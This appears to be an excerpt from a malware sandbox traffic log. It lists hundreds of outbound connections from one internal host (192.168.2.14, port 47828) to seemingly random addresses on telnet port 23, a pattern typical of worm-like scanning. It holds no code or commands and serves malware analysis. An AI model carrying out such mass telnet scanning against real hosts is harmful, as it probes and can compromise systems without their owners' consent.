                                              Nov 23, 2023 05:14:49.998624086 CET4782823192.168.2.1478.57.241.45
                                              Nov 23, 2023 05:14:49.998635054 CET4782823192.168.2.14240.116.25.160
                                              Nov 23, 2023 05:14:49.998641968 CET4782823192.168.2.14211.63.62.8
                                              Nov 23, 2023 05:14:49.998644114 CET4782823192.168.2.14218.42.91.133
                                              Nov 23, 2023 05:14:49.998651028 CET4782823192.168.2.14173.235.23.68
                                              Nov 23, 2023 05:14:49.998656988 CET4782823192.168.2.1492.66.165.182
                                              Nov 23, 2023 05:14:49.998665094 CET4782823192.168.2.14222.121.240.35
                                              Nov 23, 2023 05:14:49.998675108 CET4782823192.168.2.1469.104.33.240
                                              Nov 23, 2023 05:14:49.998675108 CET4782823192.168.2.1412.139.192.186
                                              Nov 23, 2023 05:14:49.998687983 CET4782823192.168.2.14142.34.42.170
                                              Nov 23, 2023 05:14:49.998688936 CET4782823192.168.2.1459.208.217.52
                                              Nov 23, 2023 05:14:49.998698950 CET4782823192.168.2.1495.247.174.212
                                              Nov 23, 2023 05:14:49.998701096 CET4782823192.168.2.14164.21.142.89
                                              Nov 23, 2023 05:14:49.998707056 CET4782823192.168.2.14249.212.107.177
                                              Nov 23, 2023 05:14:49.998717070 CET4782823192.168.2.1469.58.222.122
                                              Nov 23, 2023 05:14:49.998718023 CET4782823192.168.2.14135.26.186.97
                                              Nov 23, 2023 05:14:49.998733044 CET4782823192.168.2.14191.86.119.118
                                              Nov 23, 2023 05:14:49.998748064 CET4782823192.168.2.14109.57.245.252
                                              Nov 23, 2023 05:14:49.998748064 CET4782823192.168.2.1467.22.161.24
                                              Nov 23, 2023 05:14:49.998754978 CET4782823192.168.2.14198.129.0.43
                                              Nov 23, 2023 05:14:49.998765945 CET4782823192.168.2.14197.248.103.154
                                              Nov 23, 2023 05:14:49.998769999 CET4782823192.168.2.14244.120.5.148
                                              Nov 23, 2023 05:14:49.998769999 CET4782823192.168.2.14142.230.2.146
                                              Nov 23, 2023 05:14:49.998780012 CET4782823192.168.2.14148.202.64.175
                                              Nov 23, 2023 05:14:49.998806000 CET4782823192.168.2.1496.181.242.208
                                              Nov 23, 2023 05:14:49.998806000 CET4782823192.168.2.1479.70.246.140
                                              Nov 23, 2023 05:14:49.998807907 CET4782823192.168.2.144.212.22.2
                                              Nov 23, 2023 05:14:49.998810053 CET4782823192.168.2.14106.243.54.203
                                              Nov 23, 2023 05:14:49.998811007 CET4782823192.168.2.1416.249.90.182
                                              Nov 23, 2023 05:14:49.998810053 CET4782823192.168.2.14247.46.103.64
                                              Nov 23, 2023 05:14:49.998814106 CET4782823192.168.2.1465.170.90.84
                                              Nov 23, 2023 05:14:49.998810053 CET4782823192.168.2.1479.40.107.220
                                              Nov 23, 2023 05:14:49.998815060 CET4782823192.168.2.14221.199.172.22
                                              Nov 23, 2023 05:14:49.998814106 CET4782823192.168.2.14121.127.63.40
                                              Nov 23, 2023 05:14:49.998822927 CET4782823192.168.2.14245.26.211.34
                                              Nov 23, 2023 05:14:49.998822927 CET4782823192.168.2.14151.238.163.117
                                              Nov 23, 2023 05:14:49.998837948 CET4782823192.168.2.1447.238.53.231
                                              Nov 23, 2023 05:14:49.998840094 CET4782823192.168.2.1470.110.240.215
                                              Nov 23, 2023 05:14:49.998841047 CET4782823192.168.2.1453.107.250.130
                                              Nov 23, 2023 05:14:49.998843908 CET4782823192.168.2.14221.202.131.203
                                              Nov 23, 2023 05:14:49.998846054 CET4782823192.168.2.1474.239.156.99
                                              Nov 23, 2023 05:14:49.998858929 CET4782823192.168.2.14204.137.150.235
                                              Nov 23, 2023 05:14:49.998876095 CET4782823192.168.2.1486.97.210.221
                                              Nov 23, 2023 05:14:49.998877048 CET4782823192.168.2.14151.47.238.175
                                              Nov 23, 2023 05:14:49.998879910 CET4782823192.168.2.1414.98.166.149
                                              Nov 23, 2023 05:14:49.998883963 CET4782823192.168.2.1470.167.17.137
                                              Nov 23, 2023 05:14:49.998883963 CET4782823192.168.2.14170.248.186.57
                                              Nov 23, 2023 05:14:49.998892069 CET4782823192.168.2.14125.211.159.195
                                              Nov 23, 2023 05:14:49.998893976 CET4782823192.168.2.1420.12.17.159
                                              Nov 23, 2023 05:14:49.998909950 CET4782823192.168.2.14176.154.103.188
                                              Nov 23, 2023 05:14:49.998914957 CET4782823192.168.2.14208.218.76.197
                                              Nov 23, 2023 05:14:49.998915911 CET4782823192.168.2.14106.209.250.49
                                              Nov 23, 2023 05:14:49.998918056 CET4782823192.168.2.14240.183.130.16
                                              Nov 23, 2023 05:14:49.998929024 CET4782823192.168.2.14244.104.17.56
                                              Nov 23, 2023 05:14:49.998933077 CET4782823192.168.2.1413.73.81.5
                                              Nov 23, 2023 05:14:49.998935938 CET4782823192.168.2.14112.219.215.253
                                              Nov 23, 2023 05:14:49.998936892 CET4782823192.168.2.14213.244.178.104
                                              Nov 23, 2023 05:14:49.998950958 CET4782823192.168.2.1441.147.250.249
                                              Nov 23, 2023 05:14:49.998955011 CET4782823192.168.2.14197.228.9.195
                                              Nov 23, 2023 05:14:49.998955011 CET4782823192.168.2.14251.109.1.102
                                              Nov 23, 2023 05:14:49.998970032 CET4782823192.168.2.14201.241.74.32
                                              Nov 23, 2023 05:14:49.998970032 CET4782823192.168.2.14117.9.16.192
                                              Nov 23, 2023 05:14:49.998980045 CET4782823192.168.2.1462.244.100.144
                                              Nov 23, 2023 05:14:49.998980045 CET4782823192.168.2.142.194.209.78
                                              Nov 23, 2023 05:14:49.999001980 CET4782823192.168.2.14167.159.136.224
                                              Nov 23, 2023 05:14:49.999002934 CET4782823192.168.2.14154.205.205.218
                                              Nov 23, 2023 05:14:49.999005079 CET4782823192.168.2.14244.253.123.168
                                              Nov 23, 2023 05:14:49.999005079 CET4782823192.168.2.14146.23.105.18
                                              Nov 23, 2023 05:14:49.999006987 CET4782823192.168.2.14135.99.44.51
                                              Nov 23, 2023 05:14:49.999010086 CET4782823192.168.2.14181.208.92.72
                                              Nov 23, 2023 05:14:49.999011040 CET4782823192.168.2.1477.215.226.217
                                              Nov 23, 2023 05:14:49.999032974 CET4782823192.168.2.14148.39.251.142
                                              Nov 23, 2023 05:14:49.999039888 CET4782823192.168.2.14213.180.148.150
                                              Nov 23, 2023 05:14:49.999039888 CET4782823192.168.2.1443.222.18.28
                                              Nov 23, 2023 05:14:49.999041080 CET4782823192.168.2.14126.88.54.131
                                              Nov 23, 2023 05:14:49.999039888 CET4782823192.168.2.14190.140.113.196
                                              Nov 23, 2023 05:14:49.999043941 CET4782823192.168.2.1417.59.4.180
                                              Nov 23, 2023 05:14:49.999042034 CET4782823192.168.2.1420.63.130.155
                                              Nov 23, 2023 05:14:49.999044895 CET4782823192.168.2.14162.14.11.13
                                              Nov 23, 2023 05:14:49.999042034 CET4782823192.168.2.1478.29.74.98
                                              Nov 23, 2023 05:14:49.999056101 CET4782823192.168.2.1434.47.84.170
                                              Nov 23, 2023 05:14:49.999056101 CET4782823192.168.2.1447.190.75.127
                                              Nov 23, 2023 05:14:49.999064922 CET4782823192.168.2.14114.134.227.98
                                              Nov 23, 2023 05:14:49.999064922 CET4782823192.168.2.14154.9.168.94
                                              Nov 23, 2023 05:14:49.999066114 CET4782823192.168.2.14245.98.233.108
                                              Nov 23, 2023 05:14:49.999066114 CET4782823192.168.2.1446.106.9.89
                                              Nov 23, 2023 05:14:49.999066114 CET4782823192.168.2.1498.2.215.184
                                              Nov 23, 2023 05:14:49.999073982 CET4782823192.168.2.1497.229.17.153
                                              Nov 23, 2023 05:14:49.999087095 CET4782823192.168.2.1475.114.201.0
                                              Nov 23, 2023 05:14:49.999087095 CET4782823192.168.2.14218.45.226.176
                                              Nov 23, 2023 05:14:49.999087095 CET4782823192.168.2.14246.35.200.84
                                              Nov 23, 2023 05:14:49.999092102 CET4782823192.168.2.14104.237.208.86
                                              Nov 23, 2023 05:14:49.999095917 CET4782823192.168.2.14181.44.162.36
                                              Nov 23, 2023 05:14:49.999099016 CET4782823192.168.2.14201.233.122.165
                                              Nov 23, 2023 05:14:49.999106884 CET4782823192.168.2.14156.173.87.118
                                              Nov 23, 2023 05:14:49.999109030 CET4782823192.168.2.14177.28.134.156
                                              Nov 23, 2023 05:14:49.999118090 CET4782823192.168.2.14142.48.1.113
                                              Nov 23, 2023 05:14:49.999141932 CET4782823192.168.2.14163.38.73.234
                                              Nov 23, 2023 05:14:49.999141932 CET4782823192.168.2.1468.197.197.42
                                              Nov 23, 2023 05:14:49.999142885 CET4782823192.168.2.1468.93.104.225
                                              Nov 23, 2023 05:14:49.999152899 CET4782823192.168.2.14118.90.201.53
                                              Nov 23, 2023 05:14:49.999155998 CET4782823192.168.2.14173.82.91.232
                                              Nov 23, 2023 05:14:49.999155998 CET4782823192.168.2.14173.39.208.8
                                              Nov 23, 2023 05:14:49.999156952 CET4782823192.168.2.14110.55.171.121
                                              Nov 23, 2023 05:14:49.999155998 CET4782823192.168.2.1413.95.6.210
                                              Nov 23, 2023 05:14:49.999157906 CET4782823192.168.2.148.37.127.210
                                              Nov 23, 2023 05:14:49.999157906 CET4782823192.168.2.14162.90.40.110
                                              Nov 23, 2023 05:14:49.999157906 CET4782823192.168.2.14192.48.146.64
                                              Nov 23, 2023 05:14:49.999157906 CET4782823192.168.2.14204.221.251.126
                                              Nov 23, 2023 05:14:49.999161959 CET4782823192.168.2.14115.227.231.142
                                              Nov 23, 2023 05:14:49.999178886 CET4782823192.168.2.14219.254.148.152
                                              Nov 23, 2023 05:14:49.999180079 CET4782823192.168.2.14103.234.138.96
                                              Nov 23, 2023 05:14:49.999186993 CET4782823192.168.2.14193.34.161.29
                                              Nov 23, 2023 05:14:49.999190092 CET4782823192.168.2.14121.43.181.181
                                              Nov 23, 2023 05:14:49.999208927 CET4782823192.168.2.14167.147.55.67
                                              Nov 23, 2023 05:14:49.999209881 CET4782823192.168.2.14194.66.65.4
                                              Nov 23, 2023 05:14:49.999209881 CET4782823192.168.2.14108.24.82.12
                                              Nov 23, 2023 05:14:49.999212980 CET4782823192.168.2.14196.224.88.128
                                              Nov 23, 2023 05:14:49.999227047 CET4782823192.168.2.14169.40.161.215
                                              Nov 23, 2023 05:14:49.999233007 CET4782823192.168.2.14120.180.97.226
                                              Nov 23, 2023 05:14:49.999233007 CET4782823192.168.2.1473.87.156.17
                                              Nov 23, 2023 05:14:49.999238014 CET4782823192.168.2.14115.56.82.140
                                              Nov 23, 2023 05:14:49.999245882 CET4782823192.168.2.1418.205.177.249
                                              Nov 23, 2023 05:14:49.999249935 CET4782823192.168.2.1487.37.44.36
                                              Nov 23, 2023 05:14:49.999268055 CET4782823192.168.2.14240.55.218.176
                                              Nov 23, 2023 05:14:49.999268055 CET4782823192.168.2.1457.5.157.204
                                              Nov 23, 2023 05:14:49.999272108 CET4782823192.168.2.14246.223.238.179
                                              Nov 23, 2023 05:14:49.999274015 CET4782823192.168.2.14196.253.223.234
                                              Nov 23, 2023 05:14:49.999308109 CET4782823192.168.2.1459.138.176.77
                                              Nov 23, 2023 05:14:49.999308109 CET4782823192.168.2.141.187.4.186
                                              Nov 23, 2023 05:14:49.999311924 CET4782823192.168.2.14119.72.7.31
                                              Nov 23, 2023 05:14:49.999321938 CET4782823192.168.2.14107.190.234.10
                                              Nov 23, 2023 05:14:49.999321938 CET4782823192.168.2.14220.80.250.152
                                              Nov 23, 2023 05:14:49.999322891 CET4782823192.168.2.1496.59.168.183
                                              Nov 23, 2023 05:14:49.999322891 CET4782823192.168.2.1491.11.181.192
                                              Nov 23, 2023 05:14:49.999326944 CET4782823192.168.2.14154.148.215.210
                                              Nov 23, 2023 05:14:49.999326944 CET4782823192.168.2.14217.234.7.131
                                              Nov 23, 2023 05:14:49.999327898 CET4782823192.168.2.14197.196.36.108
                                              Nov 23, 2023 05:14:49.999326944 CET4782823192.168.2.14138.222.184.138
                                              Nov 23, 2023 05:14:49.999327898 CET4782823192.168.2.14111.125.77.94
                                              Nov 23, 2023 05:14:49.999327898 CET4782823192.168.2.14241.76.73.210
                                              Nov 23, 2023 05:14:49.999327898 CET4782823192.168.2.1423.218.97.232
                                              Nov 23, 2023 05:14:49.999334097 CET4782823192.168.2.14110.10.135.164
                                              Nov 23, 2023 05:14:49.999341011 CET4782823192.168.2.1488.123.22.193
                                              Nov 23, 2023 05:14:49.999353886 CET4782823192.168.2.1490.7.148.11
                                              Nov 23, 2023 05:14:49.999356985 CET4782823192.168.2.1438.115.80.238
                                              Nov 23, 2023 05:14:49.999368906 CET4782823192.168.2.1462.152.204.154
                                              Nov 23, 2023 05:14:49.999372959 CET4782823192.168.2.14120.249.31.104
                                              Nov 23, 2023 05:14:49.999376059 CET4782823192.168.2.14104.180.123.217
                                              Nov 23, 2023 05:14:49.999372959 CET4782823192.168.2.14186.237.123.69
                                              Nov 23, 2023 05:14:49.999380112 CET4782823192.168.2.1490.23.69.132
                                              Nov 23, 2023 05:14:49.999372959 CET4782823192.168.2.14133.153.28.139
                                              Nov 23, 2023 05:14:49.999381065 CET4782823192.168.2.1479.121.50.143
                                              Nov 23, 2023 05:14:49.999381065 CET4782823192.168.2.14173.227.20.180
                                              Nov 23, 2023 05:14:49.999381065 CET4782823192.168.2.1414.211.193.238
                                              Nov 23, 2023 05:14:49.999385118 CET4782823192.168.2.14181.182.251.14
                                              Nov 23, 2023 05:14:49.999388933 CET4782823192.168.2.1427.54.17.213
                                              Nov 23, 2023 05:14:49.999388933 CET4782823192.168.2.1453.175.203.41
                                              Nov 23, 2023 05:14:49.999397993 CET4782823192.168.2.14105.21.82.85
                                              Nov 23, 2023 05:14:49.999414921 CET4782823192.168.2.14164.242.220.203
                                              Nov 23, 2023 05:14:49.999414921 CET4782823192.168.2.14188.117.11.90
                                              Nov 23, 2023 05:14:49.999418020 CET4782823192.168.2.14180.24.208.106
                                              Nov 23, 2023 05:14:49.999418974 CET4782823192.168.2.1443.178.114.20
                                              Nov 23, 2023 05:14:49.999424934 CET4782823192.168.2.14162.242.26.46
                                              Nov 23, 2023 05:14:49.999424934 CET4782823192.168.2.14187.118.181.22
                                              Nov 23, 2023 05:14:49.999435902 CET4782823192.168.2.1492.11.154.87
                                              Nov 23, 2023 05:14:49.999435902 CET4782823192.168.2.1473.140.138.65
                                              Nov 23, 2023 05:14:49.999442101 CET4782823192.168.2.14180.86.35.29
                                              Nov 23, 2023 05:14:49.999442101 CET4782823192.168.2.14197.138.253.17
                                              Nov 23, 2023 05:14:49.999444008 CET4782823192.168.2.1416.44.164.157
                                              Nov 23, 2023 05:14:49.999464035 CET4782823192.168.2.1437.145.150.35
                                              Nov 23, 2023 05:14:49.999465942 CET4782823192.168.2.14188.133.123.223
                                              Nov 23, 2023 05:14:49.999471903 CET4782823192.168.2.14169.183.245.146
                                              Nov 23, 2023 05:14:49.999471903 CET4782823192.168.2.14172.225.185.219
                                              Nov 23, 2023 05:14:49.999474049 CET4782823192.168.2.14158.79.200.0
                                              Nov 23, 2023 05:14:49.999474049 CET4782823192.168.2.14185.190.198.215
                                              Nov 23, 2023 05:14:49.999475956 CET4782823192.168.2.1434.154.223.3
                                              Nov 23, 2023 05:14:49.999476910 CET4782823192.168.2.14135.131.23.241
                                              Nov 23, 2023 05:14:49.999480963 CET4782823192.168.2.1461.167.28.228
                                              Nov 23, 2023 05:14:49.999490023 CET4782823192.168.2.14205.176.152.140
                                              Nov 23, 2023 05:14:49.999495029 CET4782823192.168.2.142.17.13.206
                                              Nov 23, 2023 05:14:49.999504089 CET4782823192.168.2.14200.45.210.3
                                              Nov 23, 2023 05:14:49.999509096 CET4782823192.168.2.14112.27.251.120
                                              Nov 23, 2023 05:14:49.999509096 CET4782823192.168.2.14164.206.47.242
                                              Nov 23, 2023 05:14:49.999521017 CET4782823192.168.2.14183.92.155.237
                                              Nov 23, 2023 05:14:49.999521017 CET4782823192.168.2.14103.21.51.72
                                              Nov 23, 2023 05:14:49.999522924 CET4782823192.168.2.1462.109.42.48
                                              Nov 23, 2023 05:14:49.999528885 CET4782823192.168.2.14160.245.132.165
                                              Nov 23, 2023 05:14:49.999536991 CET4782823192.168.2.14101.8.99.222
                                              Nov 23, 2023 05:14:49.999540091 CET4782823192.168.2.14135.107.65.101
                                              Nov 23, 2023 05:14:49.999556065 CET4782823192.168.2.1496.134.76.0
                                              Nov 23, 2023 05:14:49.999557972 CET4782823192.168.2.148.190.62.220
                                              Nov 23, 2023 05:14:49.999566078 CET4782823192.168.2.14192.10.169.222
                                              Nov 23, 2023 05:14:49.999567032 CET4782823192.168.2.1489.22.234.42
                                              Nov 23, 2023 05:14:49.999589920 CET4782823192.168.2.14252.233.15.117
                                              Nov 23, 2023 05:14:49.999589920 CET4782823192.168.2.14167.206.218.151
                                              Nov 23, 2023 05:14:49.999593973 CET4782823192.168.2.1483.27.149.194
                                              Nov 23, 2023 05:14:49.999593973 CET4782823192.168.2.1463.199.36.159
                                              Nov 23, 2023 05:14:49.999598026 CET4782823192.168.2.1490.252.104.27
                                              Nov 23, 2023 05:14:49.999598026 CET4782823192.168.2.14139.28.78.36
                                              Nov 23, 2023 05:14:49.999598980 CET4782823192.168.2.14186.140.58.43
                                              Nov 23, 2023 05:14:49.999607086 CET4782823192.168.2.1446.190.76.106
                                              Nov 23, 2023 05:14:49.999624014 CET4782823192.168.2.14152.201.159.230
                                              Nov 23, 2023 05:14:49.999624014 CET4782823192.168.2.1464.242.213.31
                                              Nov 23, 2023 05:14:49.999629021 CET4782823192.168.2.14112.118.137.208
                                              Nov 23, 2023 05:14:49.999629974 CET4782823192.168.2.14139.153.31.201
                                              Nov 23, 2023 05:14:49.999635935 CET4782823192.168.2.1417.14.58.240
                                              Nov 23, 2023 05:14:49.999639988 CET4782823192.168.2.1420.32.117.147
                                              Nov 23, 2023 05:14:49.999655008 CET4782823192.168.2.1470.44.60.12
                                              Nov 23, 2023 05:14:49.999656916 CET4782823192.168.2.148.157.188.73
                                              Nov 23, 2023 05:14:49.999660015 CET4782823192.168.2.14110.77.214.165
                                              Nov 23, 2023 05:14:49.999660015 CET4782823192.168.2.14181.179.69.118
                                              Nov 23, 2023 05:14:49.999661922 CET4782823192.168.2.14187.95.110.28
                                              Nov 23, 2023 05:14:49.999663115 CET4782823192.168.2.14188.78.223.166
                                              Nov 23, 2023 05:14:49.999661922 CET4782823192.168.2.14193.157.181.84
                                              Nov 23, 2023 05:14:49.999663115 CET4782823192.168.2.14106.131.43.35
                                              Nov 23, 2023 05:14:49.999665022 CET4782823192.168.2.1440.34.93.118
                                              Nov 23, 2023 05:14:49.999684095 CET4782823192.168.2.14154.121.34.66
                                              Nov 23, 2023 05:14:49.999685049 CET4782823192.168.2.14185.19.206.229
                                              Nov 23, 2023 05:14:49.999686003 CET4782823192.168.2.14151.163.252.127
                                              Nov 23, 2023 05:14:49.999686956 CET4782823192.168.2.14152.245.228.144
                                              Nov 23, 2023 05:14:49.999686956 CET4782823192.168.2.14255.13.156.58
                                              Nov 23, 2023 05:14:49.999687910 CET4782823192.168.2.1491.252.184.204
                                              Nov 23, 2023 05:14:49.999692917 CET4782823192.168.2.14169.87.48.185
                                              Nov 23, 2023 05:14:49.999713898 CET4782823192.168.2.14194.157.220.100
                                              Nov 23, 2023 05:14:49.999716043 CET4782823192.168.2.1473.88.232.41
                                              Nov 23, 2023 05:14:49.999716043 CET4782823192.168.2.1445.237.108.76
                                              Nov 23, 2023 05:14:49.999721050 CET4782823192.168.2.1451.4.239.16
                                              Nov 23, 2023 05:14:49.999722004 CET4782823192.168.2.14187.100.27.166
                                              Nov 23, 2023 05:14:49.999722958 CET4782823192.168.2.1477.91.77.69
                                              Nov 23, 2023 05:14:49.999728918 CET4782823192.168.2.14211.184.151.163
                                              Nov 23, 2023 05:14:49.999730110 CET4782823192.168.2.14123.28.8.188
                                              Nov 23, 2023 05:14:49.999732018 CET4782823192.168.2.14158.60.164.249
                                              Nov 23, 2023 05:14:49.999732018 CET4782823192.168.2.1446.231.30.182
                                              Nov 23, 2023 05:14:49.999752045 CET4782823192.168.2.14117.219.239.245
                                              Nov 23, 2023 05:14:49.999754906 CET4782823192.168.2.1473.52.39.191
                                              Nov 23, 2023 05:14:49.999757051 CET4782823192.168.2.14160.7.153.87
                                              Nov 23, 2023 05:14:49.999758005 CET4782823192.168.2.14159.97.56.186
                                              Nov 23, 2023 05:14:49.999759912 CET4782823192.168.2.14157.169.186.35
                                              Nov 23, 2023 05:14:49.999761105 CET4782823192.168.2.1416.60.102.203
                                              Nov 23, 2023 05:14:49.999773026 CET4782823192.168.2.14136.21.87.122
                                              Nov 23, 2023 05:14:49.999788046 CET4782823192.168.2.14101.63.150.110
                                              Nov 23, 2023 05:14:49.999789953 CET4782823192.168.2.14118.127.78.169
                                              Nov 23, 2023 05:14:49.999799967 CET4782823192.168.2.14220.142.26.229
                                              Nov 23, 2023 05:14:49.999809027 CET4782823192.168.2.1466.239.163.40
                                              Nov 23, 2023 05:14:49.999809980 CET4782823192.168.2.1436.76.55.197
                                              Nov 23, 2023 05:14:49.999819040 CET4782823192.168.2.1460.184.167.137
                                              Nov 23, 2023 05:14:49.999824047 CET4782823192.168.2.1420.157.47.80
                                              Nov 23, 2023 05:14:49.999835968 CET4782823192.168.2.14205.244.56.5
                                              Nov 23, 2023 05:14:49.999836922 CET4782823192.168.2.1457.223.238.32
                                              Nov 23, 2023 05:14:49.999840021 CET4782823192.168.2.1460.108.20.102
                                              Nov 23, 2023 05:14:49.999850988 CET4782823192.168.2.14119.117.125.118
                                              Nov 23, 2023 05:14:49.999878883 CET4782823192.168.2.14164.215.148.53
                                              Nov 23, 2023 05:14:49.999878883 CET4782823192.168.2.14107.243.175.207
                                              Nov 23, 2023 05:14:49.999880075 CET4782823192.168.2.1443.49.130.52
                                              Nov 23, 2023 05:14:49.999881029 CET4782823192.168.2.1432.5.188.106
                                              Nov 23, 2023 05:14:49.999881029 CET4782823192.168.2.1416.241.38.72
                                              Nov 23, 2023 05:14:49.999881029 CET4782823192.168.2.14195.84.84.164
                                              Nov 23, 2023 05:14:49.999882936 CET4782823192.168.2.1462.144.158.171
                                              Nov 23, 2023 05:14:49.999888897 CET4782823192.168.2.14212.154.51.220
                                              Nov 23, 2023 05:14:49.999882936 CET4782823192.168.2.14123.250.161.108
                                              Nov 23, 2023 05:14:49.999882936 CET4782823192.168.2.14154.238.162.161
                                              Nov 23, 2023 05:14:49.999892950 CET4782823192.168.2.14142.5.162.255
                                              Nov 23, 2023 05:14:49.999897003 CET4782823192.168.2.1477.173.240.41
                                              Nov 23, 2023 05:14:49.999898911 CET4782823192.168.2.14136.88.136.209
                                              Nov 23, 2023 05:14:49.999901056 CET4782823192.168.2.14254.74.37.117
                                              Nov 23, 2023 05:14:49.999901056 CET4782823192.168.2.14207.168.5.230
                                              Nov 23, 2023 05:14:49.999902010 CET4782823192.168.2.14194.62.85.96
                                              Nov 23, 2023 05:14:49.999902010 CET4782823192.168.2.1480.145.130.143
                                              Nov 23, 2023 05:14:49.999913931 CET4782823192.168.2.14218.44.17.101
                                              Nov 23, 2023 05:14:49.999913931 CET4782823192.168.2.1459.203.53.203
                                              Nov 23, 2023 05:14:49.999922037 CET4782823192.168.2.14209.136.138.220
                                              Nov 23, 2023 05:14:49.999922037 CET4782823192.168.2.1487.113.160.101
                                              Nov 23, 2023 05:14:49.999926090 CET4782823192.168.2.1460.19.93.136
                                              Nov 23, 2023 05:14:49.999927044 CET4782823192.168.2.14120.36.142.39
                                              Nov 23, 2023 05:14:49.999926090 CET4782823192.168.2.14153.230.130.80
                                              Nov 23, 2023 05:14:49.999938011 CET4782823192.168.2.14176.113.15.17
                                              Nov 23, 2023 05:14:49.999939919 CET4782823192.168.2.14160.203.225.157
                                              Nov 23, 2023 05:14:49.999939919 CET4782823192.168.2.14161.14.183.249
                                              Nov 23, 2023 05:14:49.999943018 CET4782823192.168.2.14151.244.10.156
                                              Nov 23, 2023 05:14:49.999943972 CET4782823192.168.2.14121.200.170.245
                                              Nov 23, 2023 05:14:49.999943972 CET4782823192.168.2.1472.58.47.87
                                              Nov 23, 2023 05:14:49.999943972 CET4782823192.168.2.14105.206.205.71
                                              Nov 23, 2023 05:14:49.999949932 CET4782823192.168.2.149.1.128.24
                                              Nov 23, 2023 05:14:49.999950886 CET4782823192.168.2.14174.0.246.49
                                              Nov 23, 2023 05:14:49.999960899 CET4782823192.168.2.14203.89.184.197
                                              Nov 23, 2023 05:14:49.999960899 CET4782823192.168.2.1462.48.96.85
                                              Nov 23, 2023 05:14:49.999962091 CET4782823192.168.2.14176.111.161.138
                                              Nov 23, 2023 05:14:49.999969959 CET4782823192.168.2.1423.206.149.85
                                              Nov 23, 2023 05:14:49.999980927 CET4782823192.168.2.14195.130.198.211
                                              Nov 23, 2023 05:14:50.000000954 CET4782823192.168.2.14165.125.72.84
                                              Nov 23, 2023 05:14:50.000000954 CET4782823192.168.2.149.160.181.60
                                              Nov 23, 2023 05:14:50.000001907 CET4782823192.168.2.1478.87.144.51
                                              Nov 23, 2023 05:14:50.000005960 CET4782823192.168.2.14191.140.101.93
                                              Nov 23, 2023 05:14:50.000009060 CET4782823192.168.2.14160.242.117.170
                                              Nov 23, 2023 05:14:50.000011921 CET4782823192.168.2.1494.7.163.52
                                              Nov 23, 2023 05:14:50.000019073 CET4782823192.168.2.1464.15.86.223
                                              Nov 23, 2023 05:14:50.000024080 CET4782823192.168.2.14218.69.160.84
                                              Nov 23, 2023 05:14:50.000027895 CET4782823192.168.2.14209.51.166.187
                                              Nov 23, 2023 05:14:50.000027895 CET4782823192.168.2.1442.36.187.50
                                              Nov 23, 2023 05:14:50.000046968 CET4782823192.168.2.14218.199.51.203
                                              Nov 23, 2023 05:14:50.000049114 CET4782823192.168.2.14126.37.129.76
                                              Nov 23, 2023 05:14:50.000063896 CET4782823192.168.2.14189.46.255.66
                                              Nov 23, 2023 05:14:50.000065088 CET4782823192.168.2.14151.176.183.247
                                              Nov 23, 2023 05:14:50.000065088 CET4782823192.168.2.14179.47.198.233
                                              Nov 23, 2023 05:14:50.000066996 CET4782823192.168.2.1448.215.206.238
                                              Nov 23, 2023 05:14:50.000067949 CET4782823192.168.2.1485.150.127.124
                                              Nov 23, 2023 05:14:50.000068903 CET4782823192.168.2.1476.120.239.193
                                              Nov 23, 2023 05:14:50.000068903 CET4782823192.168.2.14209.73.182.1
                                              Nov 23, 2023 05:14:50.000068903 CET4782823192.168.2.1474.44.23.223
                                              Nov 23, 2023 05:14:50.000068903 CET4782823192.168.2.1434.145.125.220
                                              Nov 23, 2023 05:14:50.000081062 CET4782823192.168.2.14121.39.81.219
                                              Nov 23, 2023 05:14:50.000082970 CET4782823192.168.2.14206.216.245.231
                                              Nov 23, 2023 05:14:50.000086069 CET4782823192.168.2.14161.255.191.96
                                              Nov 23, 2023 05:14:50.000096083 CET4782823192.168.2.14209.229.96.104
                                              Nov 23, 2023 05:14:50.000116110 CET4782823192.168.2.1460.88.205.99
                                              Nov 23, 2023 05:14:50.000119925 CET4782823192.168.2.14184.3.117.245
                                              Nov 23, 2023 05:14:50.000129938 CET4782823192.168.2.14155.51.142.138
                                              Nov 23, 2023 05:14:50.000129938 CET4782823192.168.2.1488.33.38.135
                                              Nov 23, 2023 05:14:50.000129938 CET4782823192.168.2.14212.252.17.204
                                              Nov 23, 2023 05:14:50.000130892 CET4782823192.168.2.14116.224.162.17
                                              Nov 23, 2023 05:14:50.000130892 CET4782823192.168.2.14149.247.244.119
                                              Nov 23, 2023 05:14:50.000130892 CET4782823192.168.2.14193.100.203.154
                                              Nov 23, 2023 05:14:50.000130892 CET4782823192.168.2.14202.172.53.234
                                              Nov 23, 2023 05:14:50.000130892 CET4782823192.168.2.14185.30.190.105
                                              Nov 23, 2023 05:14:50.000143051 CET4782823192.168.2.1483.146.31.221
                                              Nov 23, 2023 05:14:50.000153065 CET4782823192.168.2.14108.108.190.63
                                              Nov 23, 2023 05:14:50.000155926 CET4782823192.168.2.14248.158.173.24
                                              Nov 23, 2023 05:14:50.000166893 CET4782823192.168.2.1471.249.185.229
                                              Nov 23, 2023 05:14:50.000169992 CET4782823192.168.2.1492.14.89.216
                                              Nov 23, 2023 05:14:50.000171900 CET4782823192.168.2.14103.48.134.58
                                              Nov 23, 2023 05:14:50.000176907 CET4782823192.168.2.14166.39.199.220
                                              Nov 23, 2023 05:14:50.000195980 CET4782823192.168.2.1445.58.116.148
                                              Nov 23, 2023 05:14:50.000195980 CET4782823192.168.2.1493.73.185.142
                                              Nov 23, 2023 05:14:50.000200033 CET4782823192.168.2.14244.251.18.91
                                              Nov 23, 2023 05:14:50.000212908 CET4782823192.168.2.14102.76.154.98
                                              Nov 23, 2023 05:14:50.000214100 CET4782823192.168.2.14154.115.5.178
                                              Nov 23, 2023 05:14:50.000224113 CET4782823192.168.2.14198.4.40.85
                                              Nov 23, 2023 05:14:50.000224113 CET4782823192.168.2.14202.78.167.188
                                              Nov 23, 2023 05:14:50.000226974 CET4782823192.168.2.14109.155.228.94
                                              Nov 23, 2023 05:14:50.000241995 CET4782823192.168.2.14175.231.199.110
                                              Nov 23, 2023 05:14:50.000243902 CET4782823192.168.2.14133.182.152.36
                                              Nov 23, 2023 05:14:50.000262976 CET4782823192.168.2.14142.41.199.186
                                              Nov 23, 2023 05:14:50.000267982 CET4782823192.168.2.1486.252.100.137
                                              Nov 23, 2023 05:14:50.000267982 CET4782823192.168.2.1493.28.159.181
                                              Nov 23, 2023 05:14:50.000267982 CET4782823192.168.2.149.145.30.33
                                              Nov 23, 2023 05:14:50.000272989 CET4782823192.168.2.14120.86.181.232
                                              Nov 23, 2023 05:14:50.000273943 CET4782823192.168.2.14252.247.76.82
                                              Nov 23, 2023 05:14:50.000277996 CET4782823192.168.2.14152.171.46.228
